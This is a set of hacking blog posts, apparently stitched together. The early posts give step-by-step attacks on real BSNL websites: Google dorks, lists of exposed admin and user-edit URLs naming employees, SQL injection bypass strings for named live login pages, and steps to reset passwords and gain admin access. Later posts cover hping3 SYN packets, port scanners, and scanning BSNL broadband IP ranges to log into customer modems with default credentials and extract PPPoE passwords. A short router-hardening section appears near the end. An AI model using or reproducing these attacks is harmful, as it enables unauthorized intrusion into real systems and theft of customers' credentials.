Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.

So Lets begin.

Search this in google :

inurl:bsnl.co.in/admin

In the search results page go to second page. You would see plenty of links of the type :

www.billchn.bsnl.co.in/admin/

Open that link and you will see lots of source code files.

Many of the links on this page show good information like :

Payment information – http://www.billchn.bsnl.co.in/admin/consol.jsp
Transaction information – http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp
Registered user page – http://www.billchn.bsnl.co.in/admin/registereduser.jsp

Even an administration page is available without login :
http://billchn.bsnl.co.in/modifypassword.jsp
and here :

http://www.billchn.bsnl.co.in/selectmodifyoption.jsp

Check out what can be hacked from there.

So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.

This is the login page :
http://www.billchn.bsnl.co.in/adminlogin.html

Another google hack term :

site:bsnl.co.in inurl:admin

Search the above and you might get some more interesting links like :

http://www.str.bsnl.co.in:8009/y_circulars_list_v.asp?showmaster=1&categary=Admin

http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=5&selected_year=2005&selected_c_institute_cd=TINST_26&selected_faculty=admin

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin

http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=11&selected_year=2001&selected_c_institute_cd=&selected_faculty=ALL

The above links appear to be : should have been password protected but they are publicly visible.

Want to hack more ?

Search for this :

site:bsnl.co.in inurl:login

and you will find urls like :

http://mpintranet.bsnl.co.in/wireless/login.asp
http://mpintranet.bsnl.co.in/fbooking/login.asp

all the above urls are vulnerable to sql injection. Enter the following as both username and password :

‘ or ’1′=’1

and you should be logged in. Happy Hacking!!

Try this url :
http://udaan.bsnl.co.in/

with username/password as :

‘ or ’1′=’1′ — ‘

Here is a screenshot :

Want to hack more ? Still not satisfied ? OK

Open this url :

http://www.vas.bsnl.co.in/stm/index.jsp

and login with

‘ or ’1′=’1′ — ‘

as username and password , and you would be logged in as admin. Here is a screenshot :

Funny isn’t it ?

Want another website ? Sure :

http://www.civil.bsnl.co.in:8080/civilbsnl/login.jsp

Login with :

‘ or ’1′=’1′ — ‘

as the username and abcd as the password. You should get logged in and the Administration Panel should be available.
Here is a screenshot :

Well done once again Bsnl!!

References :

1. SQL Injection Tutorial : http://en.wikipedia.org/wiki/SQL_injection

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl hosts a helpdesk application at :

http://dotsoft.bsnl.co.in/helpdesk

Doing a search on google for :

inurl:dotsoft.bsnl.co.in/helpdesk/moduser.asp

reveals around 225 links of users of the system.

Some urls are :

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jalnadotsoft

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=review

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sdebhr

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBASOL

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=pramarao

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jmndba

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbcdotsoft

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hacked%20by

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=aowl

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ramanap

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mbn

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cpadma

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbatrich

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=chauhanak

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=BISHNOI

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbamr

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jrbarod

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gmtdjbp

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htddba

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htd

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=helpdesk

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=qwert12345

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cjjoshi

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=APDBARTG

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=elrdba

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mramaiah

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=shalini

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gaurav

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ndshah

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DDNBSNL

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=s1ckyyyy

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nskdotsoft

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hitic

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=trp

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmjrt_tra

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBAMRT

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=reetagreenday

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asrdotsoft

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mssrama

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBADKL

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbagulbarga

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sanmalkani

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=robin

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asalgotra

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=avinash

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ngd

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ashu.yad111

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nlr

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ubuntu

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=GOADBA

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gtr

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbafbd

http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmtez_tra

The link is meant to change the user details and should have been password protected. But they dont appear to be so. If any of the above urls work , then the password can be changed , and then the same password can be used to login in the application at this url http://dotsoft.bsnl.co.in/helpdesk/default.asp.

But this is just part of it. Doing a more generic search on Google will reveal even more remarkable results.

Doing a search for this url on google as follows :

inurl:dotsoft.bsnl.co.in/helpdesk

The above will show links of applications internal pages like “Problem Details” which are publicly visible and accessible. The vulnerable urls are publicly available on google search results as well.

Some links are :

http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=70322001&sby=decomp%20%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=rajesh

http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=80524015&sby=dbcdotsoft%20%20%20%20%20%20%20%20%20%20&sto=wkgds

http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=90622012&sby=ddnbsnl%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr

http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=81220006&sby=ajdesai%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr

and so on.

Another important link found by random browsing is :

http://dotsoft.bsnl.co.in/helpdesk/viewreports.asp

It has links to various reports of the helpdesk application.

There is another helpdesk application being hosted at :
http://ap.bsnl.co.in/mishelpdesk/admin.asp

So searching for :
inurl:ap.bsnl.co.in/mishelpdesk

will reveal lots of url meant to be password protected.

But http://ap.bsnl.co.in/mishelpdesk/admin.asp is vulnerable to simple sql inject as well.
Simple enter any one of these following the password field :

‘ or ’1′=’1
‘ or ’1′=’1′ — ‘
‘ or ’1′=’1′ ({ ‘
‘ or ’1′=’1′ /* ‘

and you might get logged in.

Getting admin access on the application

1. First open any moduser link that works.

2. Now change password to “admin” and save.

3. Then login here http://dotsoft.bsnl.co.in/helpdesk/default.asp
You should see this page :

4. After logging in open this page http://dotsoft.bsnl.co.in/helpdesk/logadmin.asp

You should see admin options :

The application is in a pathetic condition. If you are a creative hacker then you may be able to hack out more from this system. Best of luck!!

Amazing stuff from Bsnl!!

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Install hping on Ubuntu as :
sudo apt-get install hping3

To send syn packets use the following command at terminal :

sudo hping3 -i u1 -S -p 80 192.168.1.1

The above command would send TCP SYN packets to 192.168.1.1
sudo is necessary since the hping3 create raw packets for the task , for raw sockets/packets root privilege is necessary on Linux.

S – indicates SYN flag
p 80 – Target port 80
i u1 – Wait for 1 micro second between each packet

More options

Sending N number of packets :

c – indicates the number of packets to send/receive

$ sudo hping3 -i u1 -S -p 80 -c 10  192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes

--- 192.168.1.1 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
$

Other options from help :

$ hping3 -help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)
$

AS of version 3 hping now is scriptable using Tcl language and also has a shell for interactive commands.
To send SYN packets :

$ sudo hping3
hping3> while {1} { hping send "ip(saddr=1.2.3.4,daddr=192.168.1.1)+tcp(sport=4231,dport=80,flags=s)" }
^Z
[2]+  Stopped                 sudo hping3
$

The above method allows for easier human readable packet crafting.

Use Wireshark to detect and analyse the packets send.

If you want to write your own code in C to send SYN packets check out this post

References :
1. http://wiki.hping.org/
2. http://www.hping.org/manpage.html

1. Angry IP Scanner

Download and Install from http://www.angryip.org/
Fast and easy to use network scanner and port scanner.

To scan ports got to Tools > Preferences > Ports > Port Selection
Enter the ports you want to scan
Start the scan.

2. nmap – network mapper

Install : sudo apt-get install nmap

Nmap is a utility for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning techniques, version detection (determine service protocols and application versions listening behind ports), and TCP/IP fingerprinting (remote host OS or device identification). Nmap also offers flexible target and port specification, decoy/stealth scanning, sunRPC scanning, and more.

Usage :

desktop:~$ nmap 192.168.1.2 -p1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-23 19:29 IST
Nmap scan report for 192.168.1.2
Host is up (0.00042s latency).
Not shown: 252 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds

nmap also has with an easy to use GUI frontends :

1. zenmap
Install : sudo apt-get install zenmap

http://nmap.org/zenmap/

2. Nmapsi4
Install : sudo apt-get install nmapsi4

http://www.nmapsi4.org/

3. Umit
Install : sudo apt-get install umit

http://www.umitproject.org/

3. pnscan

Install : sudo apt-get install pnscan

Pnscan is a multi threaded port scanner that can scan a large network very quickly. If does not have all the features that nmap have but is much faster.

Usage :

desktop:~$ pnscan 192.168.1:192.168.1.2 1:255
192.168.1.2     :    21 : TXT : 220 (vsFTPd 2.3.2)\r\n
192.168.1.2     :    22 : TXT : SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3\r\n

4. knocker

Install : sudo apt-get install knocker

Usage :

desktop:~$ knocker --host 192.168.1.2  --start-port 1 --end-port 2600 -nc

+-----------------------------------------------------------------------------+
|--=| k n o c k e r -- t h e -- n e t -- p o r t s c a n n e r |=-=[ 0.7.1 ]=-|
+-----------------------------------------------------------------------------+

 - started by user enlightened on Sun Oct 23 19:27:42 2011

 - hostname to scan: 192.168.1.2
 - resolved host ip: 192.168.1.2
 - - scan from port: 1
 - - - scan to port: 2600
 - - - -  scan type: tcp connect

+=- - - - - - - - - - - - - - - - - - - - - - - - - - - - -  s c a n n i n g  -

 -=[ 21/tcp, ftp ]=- * OPEN *
 -=[ 22/tcp, ssh ]=- * OPEN *
 -=[ 80/tcp, www ]=- * OPEN *
 -=[ 631/tcp, ipp ]=- * OPEN *

+=- - - - - - - - - - - - - - - - - - - - - - - - - - - -  c o m p l e t e d  -

 - scanned host name: 192.168.1.2 IP: 192.168.1.2

 - found 4 open ports in a total of 2600 ports scanned.

 - port scan completed in 0.04 seconds.

Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.

First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.

Ok so lets begin…

Get your IP from :

www.ipmango.com

Step 1 :

Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.
Then goto options > options ; in the display section select “only open ports” and click ok&save.

Now on the main screen put in the ip scan range as something 59.*.0.0 – 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 – 59.95.255.255. You will be surprised at the number of victims you discover.

Step 2 :

Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.
admin-admin is the default username and password that is set while manufacturing the adsl modem devices.

What follows next is the modem administration panel.
Simply search for the “WAN” option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source

Now in the source code search for this : INPUT TYPE=”PASSWORD”

and the value field of this input element will have the password

if its not there as in case of D-Link DSL 502T ADSL Routers the search for this

input type=”hidden” name=”connection0:pppoe:settings/password” value=”password” id=”uiPostPppoePassword”

and the value field will have the password

Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.

And this exposes the weak security of bsnl broadband users.

Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.

Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.

Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.

The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.

Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.

In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.

In the PPPOE mode the adsl device becomes a router – a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.

If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. “admin-admin” is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.

Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the “router” since the topology is like

(PC) -> router -> internet

So how should you secure yourself ?

1. Use RFC Bridged mode if it is sufficient for you.

2. Change the default admin password of your modem.

3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)

4. Disable remote configuration feature.

5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.

Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Update – 09-11-2011

Bsnl has implemented a technique called Port Binding, which will bind a particular username to its phone number. Then that username will only work via that phone number. Hence the above hacking method will become ineffective.
Port Binding is slowly being implemented by Bsnl over all cities and soon would cover the whole Broadband network across the country, making it more secure.